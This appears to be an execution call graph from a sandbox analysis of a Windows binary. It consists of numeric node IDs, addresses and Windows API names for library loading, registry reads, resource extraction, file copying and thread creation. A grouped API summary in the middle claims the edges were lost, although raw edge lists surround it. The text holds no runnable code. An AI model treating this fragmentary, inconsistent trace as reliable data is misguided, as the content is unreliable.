94099 94172b 80 API calls 3 library calls 94076->94099 94078 93f4ea 48 API calls 94080 9293ba 94078->94080 94080->94088 94093 92ce19 94080->94093 94081->94078 94083 93f4ea 48 API calls 94082->94083 94085 994c04 94083->94085 94086 93f4ea 48 API calls 94085->94086 94087 994c2a 94086->94087 94087->94088 94089 92ce19 48 API calls 94087->94089 94088->94066 94089->94088 94090->94060 94091->94063 94092->94081 94094 92ce28 __wsetenvp 94093->94094 94095 93ee75 48 API calls 94094->94095 94096 92ce50 _memcpy_s 94095->94096 94097 93f4ea 48 API calls 94096->94097 94098 92ce66 94097->94098 94098->94088 94099->94081 94100 92f030 94103 933b70 
94100->94103 94102 92f03c 94104 9342a5 94103->94104 94105 933bc8 94103->94105 94210 96cc5c 86 API calls 4 library calls 94104->94210 94106 933bef 94105->94106 94108 996fd1 94105->94108 94110 996f7e 94105->94110 94117 996f9b 94105->94117 94107 93f4ea 48 API calls 94106->94107 94109 933c18 94107->94109 94198 97ceca 331 API calls Mailbox 94108->94198 94113 93f4ea 48 API calls 94109->94113 94110->94106 94114 996f87 94110->94114 94112 996fbe 94197 96cc5c 86 API calls 4 library calls 94112->94197 94132 933c2c _memcpy_s __wsetenvp 94113->94132 94195 97d552 331 API calls Mailbox 94114->94195 94117->94112 94196 97da0e 331 API calls 2 library calls 94117->94196 94120 9973b0 94120->94102 94121 99737a 94216 96cc5c 86 API calls 4 library calls 94121->94216 94122 997297 94206 96cc5c 86 API calls 4 library calls 94122->94206 94126 93dce0 53 API calls 94126->94132 94128 99707e 94199 96cc5c 86 API calls 4 library calls 94128->94199 94132->94104 94132->94121 94132->94122 94132->94126 94132->94128 94134 92d645 53 API calls 94132->94134 94136 93f4ea 48 API calls 94132->94136 94138 9340df 94132->94138 94139 9972d2 94132->94139 94140 997350 94132->94140 94142 92fe30 331 API calls 94132->94142 94145 9972e9 94132->94145 94146 997363 94132->94146 94149 9342f2 94132->94149 94150 926a63 48 API calls 94132->94150 94153 99714c 94132->94153 94155 933f2b 94132->94155 94156 99733f 94132->94156 94158 92d286 48 API calls 94132->94158 94162 93ee75 48 API calls 94132->94162 94163 926eed 48 API calls 94132->94163 94167 9971e1 94132->94167 94175 92d9a0 53 API calls __cinit 94132->94175 94176 92d83d 53 API calls 94132->94176 94177 92cdb9 48 API calls 94132->94177 94178 92d6e9 94132->94178 94182 93c15c 48 API calls 94132->94182 94183 93c050 94132->94183 94194 93becb 331 API calls 94132->94194 94200 92dcae 50 API calls Mailbox 94132->94200 94201 97ccdc 48 API calls 94132->94201 94202 96a1eb 50 API calls 94132->94202 94134->94132 94136->94132 94207 96cc5c 86 API calls 4 library calls 94138->94207 94208 
96cc5c 86 API calls 4 library calls 94139->94208 94214 96cc5c 86 API calls 4 library calls 94140->94214 94142->94132 94209 96cc5c 86 API calls 4 library calls 94145->94209 94215 96cc5c 86 API calls 4 library calls 94146->94215 94217 96cc5c 86 API calls 4 library calls 94149->94217 94150->94132 94203 97ccdc 48 API calls 94153->94203 94155->94102 94213 96cc5c 86 API calls 4 library calls 94156->94213 94158->94132 94160 9971a1 94205 93c15c 48 API calls 94160->94205 94162->94132 94163->94132 94166 9971ce 94170 93c050 48 API calls 94166->94170 94167->94155 94212 96cc5c 86 API calls 4 library calls 94167->94212 94169 99715f 94169->94160 94204 97ccdc 48 API calls 94169->94204 94172 9971d6 94170->94172 94171 9971ab 94171->94104 94171->94166 94172->94167 94173 997313 94172->94173 94211 96cc5c 86 API calls 4 library calls 94173->94211 94175->94132 94176->94132 94177->94132 94179 92d6f4 94178->94179 94180 92d71b 94179->94180 94218 92d764 55 API calls 94179->94218 94180->94132 94182->94132 94184 93c064 94183->94184 94186 93c069 Mailbox 94183->94186 94219 93c1af 48 API calls 94184->94219 94191 93c077 94186->94191 94220 93c15c 48 API calls 94186->94220 94188 93f4ea 48 API calls 94189 93c108 94188->94189 94192 93f4ea 48 API calls 94189->94192 94190 93c152 94190->94132 94191->94188 94191->94190 94193 93c113 94192->94193 94193->94132 94194->94132 94195->94155 94196->94112 94197->94108 94198->94132 94199->94155 94200->94132 94201->94132 94202->94132 94203->94169 94204->94169 94205->94171 94206->94138 94207->94155 94208->94145 94209->94155 94210->94155 94211->94155 94212->94155 94213->94155 94214->94155 94215->94155 94216->94155 94217->94120 94218->94180 94219->94186 94220->94191 94221 92ef80 94222 933b70 331 API calls 94221->94222 94223 92ef8c 94222->94223 94224 9919cb 94229 922322 94224->94229 94226 9919d1 94262 940f0a 52 API calls __cinit 94226->94262 94228 9919db 94230 922344 94229->94230 94263 9226df 94230->94263 94237 92d7f7 48 API calls 94238 92238e 94237->94238 94239 92d7f7 
48 API calls 94238->94239 94240 922398 94239->94240 94241 92d7f7 48 API calls 94240->94241 94242 9223de 94241->94242 94243 92d7f7 48 API calls 94242->94243 94244 9224c1 94243->94244 94276 92263f 94244->94276 94248 9224f1 94249 92d7f7 48 API calls 94248->94249 94250 9224fb 94249->94250 94305 922745 94250->94305 94252 922546 94253 922556 GetStdHandle 94252->94253 94254 9225b1 94253->94254 94255 99501d 94253->94255 94256 9225b7 CoInitialize 94254->94256 94255->94254 94257 995026 94255->94257 94256->94226 94312 9692d4 53 API calls 94257->94312 94259 99502d 94313 9699f9 CreateThread 94259->94313 94261 995039 CloseHandle 94261->94256 94262->94228 94314 922854 94263->94314 94266 926a63 48 API calls 94267 92234a 94266->94267 94268 92272e 94267->94268 94328 9227ec 6 API calls 94268->94328 94270 92237a 94271 92d7f7 94270->94271 94272 93f4ea 48 API calls 94271->94272 94273 92d818 94272->94273 94274 93f4ea 48 API calls 94273->94274 94275 922384 94274->94275 94275->94237 94277 92d7f7 48 API calls 94276->94277 94278 92264f 94277->94278 94279 92d7f7 48 API calls 94278->94279 94280 922657 94279->94280 94329 9226a7 94280->94329 94283 9226a7 48 API calls 94284 922667 94283->94284 94285 92d7f7 48 API calls 94284->94285 94286 922672 94285->94286 94287 93f4ea 48 API calls 94286->94287 94288 9224cb 94287->94288 94289 9222a4 94288->94289 94290 9222b2 94289->94290 94291 92d7f7 48 API calls 94290->94291 94292 9222bd 94291->94292 94293 92d7f7 48 API calls 94292->94293 94294 9222c8 94293->94294 94295 92d7f7 48 API calls 94294->94295 94296 9222d3 94295->94296 94297 92d7f7 48 API calls 94296->94297 94298 9222de 94297->94298 94299 9226a7 48 API calls 94298->94299 94300 9222e9 94299->94300 94301 93f4ea 48 API calls 94300->94301 94302 9222f0 94301->94302 94303 9222f9 RegisterWindowMessageW 94302->94303 94304 991fe7 94302->94304 94303->94248 94306 995f4d 94305->94306 94307 922755 94305->94307 94334 96c942 50 API calls 94306->94334 94308 93f4ea 48 API calls 94307->94308 94311 92275d 94308->94311 
94310 995f58 94311->94252 94312->94259 94313->94261 94335 9699df 54 API calls 94313->94335 94321 922870 94314->94321 94317 922870 48 API calls 94318 922864 94317->94318 94319 92d7f7 48 API calls 94318->94319 94320 922716 94319->94320 94320->94266 94322 92d7f7 48 API calls 94321->94322 94323 92287b 94322->94323 94324 92d7f7 48 API calls 94323->94324 94325 922883 94324->94325 94326 92d7f7 48 API calls 94325->94326 94327 92285c 94326->94327 94327->94317 94328->94270 94330 92d7f7 48 API calls 94329->94330 94331 9226b0 94330->94331 94332 92d7f7 48 API calls 94331->94332 94333 92265f 94332->94333 94333->94283 94334->94310 94336 99197b 94341 93dd94 94336->94341 94340 99198a 94342 93f4ea 48 API calls 94341->94342 94343 93dd9c 94342->94343 94344 93ddb0 94343->94344 94349 93df3d 94343->94349 94348 940f0a 52 API calls __cinit 94344->94348 94348->94340 94350 93df46 94349->94350 94352 93dda8 94349->94352 94381 940f0a 52 API calls __cinit 94350->94381 94353 93ddc0 94352->94353 94354 92d7f7 48 API calls 94353->94354 94355 93ddd7 GetVersionExW 94354->94355 94356 926a63 48 API calls 94355->94356 94357 93de1a 94356->94357 94382 93dfb4 94357->94382 94361 9924c8 94365 93debb 94367 93dee3 94365->94367 94368 93df31 GetSystemInfo 94365->94368 94366 93dea4 GetCurrentProcess 94399 93df5f LoadLibraryA GetProcAddress 94366->94399 94393 93e00c 94367->94393 94371 93df0e 94368->94371 94373 93df21 94371->94373 94374 93df1c FreeLibrary 94371->94374 94373->94344 94374->94373 94375 93df29 GetSystemInfo 94378 93df03 94375->94378 94376 93def9 94396 93dff4 94376->94396 94378->94371 94380 93df09 FreeLibrary 94378->94380 94380->94371 94381->94352 94383 93dfbd 94382->94383 94384 92b18b 48 API calls 94383->94384 94385 93de22 94384->94385 94386 926571 94385->94386 94387 92657f 94386->94387 94388 92b18b 48 API calls 94387->94388 94389 92658f 94388->94389 94389->94361 94390 93df77 94389->94390 94400 93df89 94390->94400 94404 93e01e 94393->94404 94397 93e00c 2 API calls 94396->94397 94398 93df01 
GetNativeSystemInfo 94397->94398 94398->94378 94399->94365 94401 93dea0 94400->94401 94402 93df92 LoadLibraryA 94400->94402 94401->94365 94401->94366 94402->94401 94403 93dfa3 GetProcAddress 94402->94403 94403->94401 94405 93def1 94404->94405 94406 93e027 LoadLibraryA 94404->94406 94405->94375 94405->94376 94406->94405 94407 93e038 GetProcAddress 94406->94407 94407->94405 94408 9919ba 94413 93c75a 94408->94413 94412 9919c9 94414 92d7f7 48 API calls 94413->94414 94415 93c7c8 94414->94415 94421 93d26c 94415->94421 94418 93c865 94419 93c881 94418->94419 94424 93d1fa 48 API calls _memcpy_s 94418->94424 94420 940f0a 52 API calls __cinit 94419->94420 94420->94412 94425 93d298 94421->94425 94424->94418 94426 93d28b 94425->94426 94427 93d2a5 94425->94427 94426->94418 94427->94426 94428 93d2ac RegOpenKeyExW 94427->94428 94428->94426 94429 93d2c6 RegQueryValueExW 94428->94429 94430 93d2e7 94429->94430 94431 93d2fc RegCloseKey 94429->94431 94430->94431 94431->94426 94432 9919dd 94437 924a30 94432->94437 94434 9919f1 94457 940f0a 52 API calls __cinit 94434->94457 94436 9919fb 94438 924a40 __ftell_nolock 94437->94438 94439 92d7f7 48 API calls 94438->94439 94440 924af6 94439->94440 94458 925374 94440->94458 94442 924aff 94465 92363c 94442->94465 94445 92518c 48 API calls 94446 924b18 94445->94446 94471 9264cf 94446->94471 94449 92d7f7 48 API calls 94450 924b32 94449->94450 94477 9249fb 94450->94477 94452 924b43 Mailbox 94452->94434 94453 9261a6 48 API calls 94456 924b3d _wcscat Mailbox __wsetenvp 94453->94456 94454 92ce19 48 API calls 94454->94456 94455 9264cf 48 API calls 94455->94456 94456->94452 94456->94453 94456->94454 94456->94455 94457->94436 94491 94f8a0 94458->94491 94461 92ce19 48 API calls 94462 9253a7 94461->94462 94493 92660f 94462->94493 94464 9253b1 Mailbox 94464->94442 94466 923649 __ftell_nolock 94465->94466 94500 92366c GetFullPathNameW 94466->94500 94468 92365a 94469 926a63 48 API calls 94468->94469 94470 923669 94469->94470 94470->94445 94472 92651b 
94471->94472 94476 9264dd _memcpy_s 94471->94476 94474 93f4ea 48 API calls 94472->94474 94473 93f4ea 48 API calls 94475 924b29 94473->94475 94474->94476 94475->94449 94476->94473 94502 92bcce 94477->94502 94480 9941cc RegQueryValueExW 94482 9941e5 94480->94482 94483 994246 RegCloseKey 94480->94483 94481 924a2b 94481->94456 94484 93f4ea 48 API calls 94482->94484 94485 9941fe 94484->94485 94508 9247b7 94485->94508 94488 994224 94489 926a63 48 API calls 94488->94489 94490 99423b 94489->94490 94490->94483 94492 925381 GetModuleFileNameW 94491->94492 94492->94461 94494 94f8a0 __ftell_nolock 94493->94494 94495 92661c GetFullPathNameW 94494->94495 94496 926a63 48 API calls 94495->94496 94497 926643 94496->94497 94498 926571 48 API calls 94497->94498 94499 92664f 94498->94499 94499->94464 94501 92368a 94500->94501 94501->94468 94503 924a0a RegOpenKeyExW 94502->94503 94504 92bce8 94502->94504 94503->94480 94503->94481 94505 93f4ea 48 API calls 94504->94505 94506 92bcf2 94505->94506 94507 93ee75 48 API calls 94506->94507 94507->94503 94509 93f4ea 48 API calls 94508->94509 94510 9247c9 RegQueryValueExW 94509->94510 94510->94488 94510->94490 94511 999bec 94546 930ae0 _memcpy_s Mailbox 94511->94546 94513 93f4ea 48 API calls 94513->94546 94516 93f4ea 48 API calls 94539 92fec8 94516->94539 94518 93146e 94526 926eed 48 API calls 94518->94526 94519 930509 94684 96cc5c 86 API calls 4 library calls 94519->94684 94521 931473 94683 96cc5c 86 API calls 4 library calls 94521->94683 94524 99a246 94528 926eed 48 API calls 94524->94528 94525 99a922 94542 92ffe1 Mailbox 94526->94542 94527 926eed 48 API calls 94527->94539 94528->94542 94531 92d7f7 48 API calls 94531->94539 94532 99a873 94533 99a30e 94533->94542 94679 9597ed InterlockedDecrement 94533->94679 94534 9597ed InterlockedDecrement 94534->94539 94535 92ce19 48 API calls 94535->94546 94536 940f0a 52 API calls __cinit 94536->94539 94538 99a973 94685 96cc5c 86 API calls 4 library calls 94538->94685 94539->94516 94539->94518 94539->94519 
Execution graph (rendered call graph; only the node labels survive text extraction, the edge list is not recoverable)

Windows API calls named in the surviving graph nodes:
Process and memory: GetCurrentProcess, TerminateProcess, ExitProcess, VirtualProtect, RtlFreeHeap, InterlockedDecrement, IsProcessorFeaturePresent, GetLastError
Dynamic library resolution: LoadLibraryA, LoadLibraryExW, GetProcAddress, GetModuleHandleW, GetModuleHandleExW, FreeLibrary
PE resource access chain: CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource, LockResource
File system: GetTempPathW, GetTempFileNameW, CopyFileW, CreateFileW, SetFileTime, GetFileType, WriteFile, GetFileAttributesW, FindFirstFileW, FindClose, CloseHandle
Console and strings: GetConsoleMode, GetConsoleCP, CharUpperBuffW, CharLowerBuffW
Synchronization and timing: InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, WaitForSingleObject, GetExitCodeProcess, Sleep, timeGetTime, GetSystemTimeAsFileTime
Window message pump: PeekMessageW, GetMessageW, TranslateMessage, DispatchMessageW, LockWindowUpdate, DestroyWindow

Remaining node labels (Mailbox, _memcpy_s, _wcscpy, _wcscat, _wcschr, _wcscmp, _strcat, _strlen, _memset, _free, _fseek, __cinit, __wsetenvp, __dosmaperr, __getptd_noexit, __cftog_l, __wsopen_helper, __lseeki64_nolock, __flush, __lock, ___createFile, ___crtCorExitProcess) are C runtime and interpreter helper functions inside the sample, not imported Windows APIs.
95817->95818 95818->95808 95819 92d7f7 48 API calls 95819->95847 95820->95847 95948 921caa 49 API calls 95821->95948 95824->95847 95826->95808 95828 93dc38 timeGetTime 95828->95847 95829 995926 GetExitCodeProcess 95830 99593c WaitForSingleObject 95829->95830 95831 995952 CloseHandle 95829->95831 95830->95808 95830->95831 95831->95847 95832->95808 95833 988c4b 108 API calls 95833->95847 95834 922c79 107 API calls 95834->95847 95836 995432 Sleep 95836->95832 95837 9959ae Sleep 95837->95808 95839 92ce19 48 API calls 95839->95847 95842->95808 95843 92d6e9 55 API calls 95843->95847 95844->95808 95845->95808 95847->95808 95847->95819 95847->95828 95847->95829 95847->95832 95847->95833 95847->95834 95847->95836 95847->95837 95847->95839 95847->95843 95950 964cbe 49 API calls Mailbox 95847->95950 95951 921caa 49 API calls 95847->95951 95952 922aae 331 API calls 95847->95952 95953 97ccb2 50 API calls 95847->95953 95954 967a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 95847->95954 95955 966532 63 API calls 3 library calls 95847->95955 95849->95808 95850->95808 95851->94908 95852->94908 95853->94908 95854->94908 95855->94908 95856->94908 95857->94908 95858->94908 95859->94908 95860->94908 95861->95788 95863 92ef2f 95862->95863 95864 92ef1d 95862->95864 95957 96cc5c 86 API calls 4 library calls 95863->95957 95956 92e3b0 331 API calls 2 library calls 95864->95956 95866 92ef26 95866->95808 95868 9986f9 95868->95868 95870 92f130 95869->95870 95873 92fe30 331 API calls 95870->95873 95878 92f199 95870->95878 95871 92f3dd 95874 9987c8 95871->95874 95884 92f3f2 95871->95884 95921 92f431 Mailbox 95871->95921 95872 92f595 95879 92d7f7 48 API calls 95872->95879 95872->95921 95875 998728 95873->95875 95962 96cc5c 86 API calls 4 library calls 95874->95962 95875->95878 95959 96cc5c 86 API calls 4 library calls 95875->95959 95876 92fe30 331 API calls 95876->95921 95878->95871 95878->95872 95882 92d7f7 48 API calls 95878->95882 95912 92f229 
95878->95912 95881 9987a3 95879->95881 95961 940f0a 52 API calls __cinit 95881->95961 95886 998772 95882->95886 95911 92f418 95884->95911 95963 969af1 48 API calls 95884->95963 95885 998b1b 95902 998b2c 95885->95902 95903 998bcf 95885->95903 95960 940f0a 52 API calls __cinit 95886->95960 95888 92f770 95892 998a45 95888->95892 95909 92f77a 95888->95909 95890 92d6e9 55 API calls 95890->95921 95891 998b7e 95972 97e40a 331 API calls Mailbox 95891->95972 95969 93c1af 48 API calls 95892->95969 95893 998c53 95977 96cc5c 86 API calls 4 library calls 95893->95977 95894 998810 95964 97eef8 331 API calls 95894->95964 95895 92fe30 331 API calls 95914 92f6aa 95895->95914 95896 998beb 95975 97bdbd 331 API calls Mailbox 95896->95975 95971 97f5ee 331 API calls 95902->95971 95974 96cc5c 86 API calls 4 library calls 95903->95974 95906 931b90 48 API calls 95906->95921 95907 931b90 48 API calls 95907->95921 95909->95906 95910 998c00 95933 92f537 Mailbox 95910->95933 95976 96cc5c 86 API calls 4 library calls 95910->95976 95911->95885 95911->95914 95911->95921 95912->95871 95912->95872 95912->95911 95912->95921 95913 92fce0 95913->95933 95973 96cc5c 86 API calls 4 library calls 95913->95973 95914->95888 95914->95895 95914->95913 95914->95921 95914->95933 95916 998823 95916->95911 95920 99884b 95916->95920 95919 96cc5c 86 API calls 95919->95921 95965 97ccdc 48 API calls 95920->95965 95921->95876 95921->95890 95921->95891 95921->95893 95921->95896 95921->95907 95921->95913 95921->95919 95921->95933 95958 92dd47 48 API calls _memcpy_s 95921->95958 95970 9597ed InterlockedDecrement 95921->95970 95978 93c1af 48 API calls 95921->95978 95923 998857 95925 9988aa 95923->95925 95926 998865 95923->95926 95930 9988a0 Mailbox 95925->95930 95967 96a69d 48 API calls 95925->95967 95966 969b72 48 API calls 95926->95966 95927 92fe30 331 API calls 95927->95933 95930->95927 95931 9988e7 95968 92bc74 48 API calls 95931->95968 95933->95808 95936 93e253 95934->95936 95937 99df42 95934->95937 95935 99df77 
95936->95808 95937->95935 95938 99df59 TranslateAcceleratorW 95937->95938 95938->95936 95940 93dca3 95939->95940 95942 93dc71 95939->95942 95940->95808 95941 93dc96 IsDialogMessageW 95941->95940 95941->95942 95942->95940 95942->95941 95943 99dd1d GetClassLongW 95942->95943 95943->95941 95943->95942 95944->95808 95945->95794 95946->95798 95947->95803 95948->95808 95949->95808 95950->95847 95951->95847 95952->95847 95953->95847 95954->95847 95955->95847 95956->95866 95957->95868 95958->95921 95959->95878 95960->95912 95961->95921 95962->95933 95963->95894 95964->95916 95965->95923 95966->95930 95967->95931 95968->95930 95969->95921 95970->95921 95971->95921 95972->95913 95973->95933 95974->95933 95975->95910 95976->95933 95977->95933 95978->95921 95979 945dfd 95980 945e09 _fseek 95979->95980 96016 947eeb GetStartupInfoW 95980->96016 95983 945e0e 96018 949ca7 GetProcessHeap 95983->96018 95984 945e66 95985 945e71 95984->95985 96103 945f4d 47 API calls 3 library calls 95984->96103 96019 947b47 95985->96019 95988 945e77 95989 945e82 __RTC_Initialize 95988->95989 96104 945f4d 47 API calls 3 library calls 95988->96104 96040 94acb3 95989->96040 95992 945e91 95993 945e9d GetCommandLineW 95992->95993 96105 945f4d 47 API calls 3 library calls 95992->96105 96059 952e7d GetEnvironmentStringsW 95993->96059 95996 945e9c 95996->95993 96000 945ec2 96072 952cb4 96000->96072 96003 945ec8 96004 945ed3 96003->96004 96107 94115b 47 API calls 3 library calls 96003->96107 96086 941195 96004->96086 96007 945edb 96008 945ee6 __wwincmdln 96007->96008 96108 94115b 47 API calls 3 library calls 96007->96108 96090 923a0f 96008->96090 96011 945efa 96012 945f09 96011->96012 96109 9413f1 47 API calls _doexit 96011->96109 96110 941186 47 API calls _doexit 96012->96110 96015 945f0e _fseek 96017 947f01 96016->96017 96017->95983 96018->95984 96111 94123a 30 API calls 2 library calls 96019->96111 96021 947b4c 96112 947e23 InitializeCriticalSectionAndSpinCount 96021->96112 96023 947b51 96024 947b55 
96023->96024 96114 947e6d TlsAlloc 96023->96114 96113 947bbd 50 API calls 2 library calls 96024->96113 96027 947b5a 96027->95988 96028 947b67 96028->96024 96029 947b72 96028->96029 96115 946986 96029->96115 96032 947bb4 96123 947bbd 50 API calls 2 library calls 96032->96123 96035 947b93 96035->96032 96037 947b99 96035->96037 96036 947bb9 96036->95988 96122 947a94 47 API calls 4 library calls 96037->96122 96039 947ba1 GetCurrentThreadId 96039->95988 96041 94acbf _fseek 96040->96041 96042 947cf4 __lock 47 API calls 96041->96042 96043 94acc6 96042->96043 96044 946986 __calloc_crt 47 API calls 96043->96044 96045 94acd7 96044->96045 96046 94ad42 GetStartupInfoW 96045->96046 96047 94ace2 _fseek @_EH4_CallFilterFunc@8 96045->96047 96054 94ae80 96046->96054 96056 94ad57 96046->96056 96047->95992 96048 94af44 96132 94af58 LeaveCriticalSection _doexit 96048->96132 96050 94aec9 GetStdHandle 96050->96054 96051 946986 __calloc_crt 47 API calls 96051->96056 96052 94aedb GetFileType 96052->96054 96053 94ada5 96053->96054 96057 94ade5 InitializeCriticalSectionAndSpinCount 96053->96057 96058 94add7 GetFileType 96053->96058 96054->96048 96054->96050 96054->96052 96055 94af08 InitializeCriticalSectionAndSpinCount 96054->96055 96055->96054 96056->96051 96056->96053 96056->96054 96057->96053 96058->96053 96058->96057 96060 945ead 96059->96060 96061 952e8e 96059->96061 96066 952a7b GetModuleFileNameW 96060->96066 96133 9469d0 47 API calls __crtGetStringTypeA_stat 96061->96133 96064 952eb4 _memcpy_s 96065 952eca FreeEnvironmentStringsW 96064->96065 96065->96060 96067 952aaf _wparse_cmdline 96066->96067 96068 945eb7 96067->96068 96069 952ae9 96067->96069 96068->96000 96106 94115b 47 API calls 3 library calls 96068->96106 96134 9469d0 47 API calls __crtGetStringTypeA_stat 96069->96134 96071 952aef _wparse_cmdline 96071->96068 96073 952ccd __wsetenvp 96072->96073 96077 952cc5 96072->96077 96074 946986 __calloc_crt 47 API calls 96073->96074 96082 952cf6 __wsetenvp 96074->96082 96075 952d4d 
96076 941c9d _free 47 API calls 96075->96076 96076->96077 96077->96003 96078 946986 __calloc_crt 47 API calls 96078->96082 96079 952d72 96080 941c9d _free 47 API calls 96079->96080 96080->96077 96082->96075 96082->96077 96082->96078 96082->96079 96083 952d89 96082->96083 96135 952567 47 API calls __cftog_l 96082->96135 96136 946e20 IsProcessorFeaturePresent 96083->96136 96085 952d95 96085->96003 96087 9411a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 96086->96087 96089 9411e0 __IsNonwritableInCurrentImage 96087->96089 96151 940f0a 52 API calls __cinit 96087->96151 96089->96007 96091 991ebf 96090->96091 96092 923a29 96090->96092 96093 923a63 IsThemeActive 96092->96093 96152 941405 96093->96152 96097 923a8f 96164 923adb SystemParametersInfoW SystemParametersInfoW 96097->96164 96099 923a9b 96165 923d19 96099->96165 96101 923aa3 SystemParametersInfoW 96102 923ac8 96101->96102 96102->96011 96103->95985 96104->95989 96105->95996 96109->96012 96110->96015 96111->96021 96112->96023 96113->96027 96114->96028 96117 94698d 96115->96117 96118 9469ca 96117->96118 96119 9469ab Sleep 96117->96119 96124 9530aa 96117->96124 96118->96032 96121 947ec9 TlsSetValue 96118->96121 96120 9469c2 96119->96120 96120->96117 96120->96118 96121->96035 96122->96039 96123->96036 96125 9530b5 96124->96125 96130 9530d0 __calloc_impl 96124->96130 96126 9530c1 96125->96126 96125->96130 96131 947c0e 47 API calls __getptd_noexit 96126->96131 96128 9530e0 HeapAlloc 96129 9530c6 96128->96129 96128->96130 96129->96117 96130->96128 96130->96129 96131->96129 96132->96047 96133->96064 96134->96071 96135->96082 96137 946e2b 96136->96137 96142 946cb5 96137->96142 96141 946e46 96141->96085 96143 946ccf _memset __call_reportfault 96142->96143 96144 946cef IsDebuggerPresent 96143->96144 96150 9481ac SetUnhandledExceptionFilter UnhandledExceptionFilter 96144->96150 96146 94a70c __cftog_l 6 API calls 96148 946dd6 96146->96148 96147 946db3 __call_reportfault 96147->96146 96149 948197 
GetCurrentProcess TerminateProcess 96148->96149 96149->96141 96150->96147 96151->96089 96153 947cf4 __lock 47 API calls 96152->96153 96154 941410 96153->96154 96217 947e58 LeaveCriticalSection 96154->96217 96156 923a88 96157 94146d 96156->96157 96158 941477 96157->96158 96159 941491 96157->96159 96158->96159 96218 947c0e 47 API calls __getptd_noexit 96158->96218 96159->96097 96161 941481 96219 946e10 8 API calls __cftog_l 96161->96219 96163 94148c 96163->96097 96164->96099 96166 923d26 __ftell_nolock 96165->96166 96167 92d7f7 48 API calls 96166->96167 96168 923d31 GetCurrentDirectoryW 96167->96168 96220 9261ca 96168->96220 96170 923d57 IsDebuggerPresent 96171 923d65 96170->96171 96172 991cc1 MessageBoxA 96170->96172 96173 991cd9 96171->96173 96174 923d82 96171->96174 96204 923e3a 96171->96204 96172->96173 96335 93c682 48 API calls 96173->96335 96294 9240e5 96174->96294 96175 923e41 SetCurrentDirectoryW 96178 923e4e Mailbox 96175->96178 96178->96101 96179 991ce9 96184 991cff SetCurrentDirectoryW 96179->96184 96184->96178 96204->96175 96217->96156 96218->96161 96219->96163 96337 93e99b 96220->96337 96224 9261eb 96225 925374 50 API calls 96224->96225 96226 9261ff 96225->96226 96227 92ce19 48 API calls 96226->96227 96228 92620c 96227->96228 96354 9239db 96228->96354 96230 926216 Mailbox 96231 926eed 48 API calls 96230->96231 96232 92622b 96231->96232 96366 929048 96232->96366 96235 92ce19 48 API calls 96236 926244 96235->96236 96237 92d6e9 55 API calls 96236->96237 96238 926254 Mailbox 96237->96238 96239 92ce19 48 API calls 96238->96239 96240 92627c 96239->96240 96241 92d6e9 55 API calls 96240->96241 96242 92628f Mailbox 96241->96242 96243 92ce19 48 API calls 96242->96243 96244 9262a0 96243->96244 96245 92d645 53 API calls 96244->96245 96246 9262b2 Mailbox 96245->96246 96247 92d7f7 48 API calls 96246->96247 96248 9262c5 96247->96248 96369 9263fc 96248->96369 96252 9262df 96253 991c08 96252->96253 96254 9262e9 96252->96254 96256 9263fc 48 API calls 96253->96256 96255 
940fa7 _W_store_winword 59 API calls 96254->96255 96257 9262f4 96255->96257 96258 991c1c 96256->96258 96257->96258 96259 9262fe 96257->96259 96260 9263fc 48 API calls 96258->96260 96261 940fa7 _W_store_winword 59 API calls 96259->96261 96262 991c38 96260->96262 96263 926309 96261->96263 96265 925374 50 API calls 96262->96265 96263->96262 96264 926313 96263->96264 96266 940fa7 _W_store_winword 59 API calls 96264->96266 96267 991c5d 96265->96267 96268 92631e 96266->96268 96269 9263fc 48 API calls 96267->96269 96270 92635f 96268->96270 96271 991c86 96268->96271 96274 9263fc 48 API calls 96268->96274 96273 991c69 96269->96273 96270->96271 96272 92636c 96270->96272 96275 926eed 48 API calls 96271->96275 96279 93c050 48 API calls 96272->96279 96276 926eed 48 API calls 96273->96276 96277 926342 96274->96277 96278 991ca8 96275->96278 96280 991c77 96276->96280 96281 926eed 48 API calls 96277->96281 96282 9263fc 48 API calls 96278->96282 96283 926384 96279->96283 96284 9263fc 48 API calls 96280->96284 96285 926350 96281->96285 96286 991cb5 96282->96286 96287 931b90 48 API calls 96283->96287 96284->96271 96288 9263fc 48 API calls 96285->96288 96286->96286 96291 926394 96287->96291 96288->96270 96289 931b90 48 API calls 96289->96291 96291->96289 96292 9263fc 48 API calls 96291->96292 96293 9263d6 Mailbox 96291->96293 96385 926b68 48 API calls 96291->96385 96292->96291 96293->96170 96295 9240f2 __ftell_nolock 96294->96295 96296 99370e _memset 96295->96296 96297 92410b 96295->96297 96300 99372a GetOpenFileNameW 96296->96300 96298 92660f 49 API calls 96297->96298 96299 924114 96298->96299 96427 9240a7 96299->96427 96302 993779 96300->96302 96304 926a63 48 API calls 96302->96304 96306 99378e 96304->96306 96306->96306 96335->96179 96338 92d7f7 48 API calls 96337->96338 96339 9261db 96338->96339 96340 926009 96339->96340 96341 926016 __ftell_nolock 96340->96341 96342 926a63 48 API calls 96341->96342 96347 92617c Mailbox 96341->96347 96344 926048 96342->96344 96350 92607e Mailbox 
96344->96350 96386 9261a6 96344->96386 96345 92614f 96346 92ce19 48 API calls 96345->96346 96345->96347 96349 926170 96346->96349 96347->96224 96348 92ce19 48 API calls 96348->96350 96351 9264cf 48 API calls 96349->96351 96350->96345 96350->96347 96350->96348 96352 9264cf 48 API calls 96350->96352 96353 9261a6 48 API calls 96350->96353 96351->96347 96352->96350 96353->96350 96355 9241a9 136 API calls 96354->96355 96357 9239fe 96355->96357 96356 923a06 96356->96230 96357->96356 96389 96c396 96357->96389 96360 992ff0 96362 941c9d _free 47 API calls 96360->96362 96361 924252 84 API calls 96361->96360 96363 992ffd 96362->96363 96364 924252 84 API calls 96363->96364 96365 993006 96364->96365 96365->96365 96367 93f4ea 48 API calls 96366->96367 96368 926237 96367->96368 96368->96235 96370 926406 96369->96370 96371 92641f 96369->96371 96372 926eed 48 API calls 96370->96372 96373 926a63 48 API calls 96371->96373 96374 9262d1 96372->96374 96373->96374 96375 940fa7 96374->96375 96376 940fb3 96375->96376 96377 941028 96375->96377 96379 940fd8 96376->96379 96424 947c0e 47 API calls __getptd_noexit 96376->96424 96426 94103a 59 API calls 3 library calls 96377->96426 96379->96252 96381 941035 96381->96252 96382 940fbf 96425 946e10 8 API calls __cftog_l 96382->96425 96384 940fca 96384->96252 96385->96291 96387 92bdfa 48 API calls 96386->96387 96388 9261b1 96387->96388 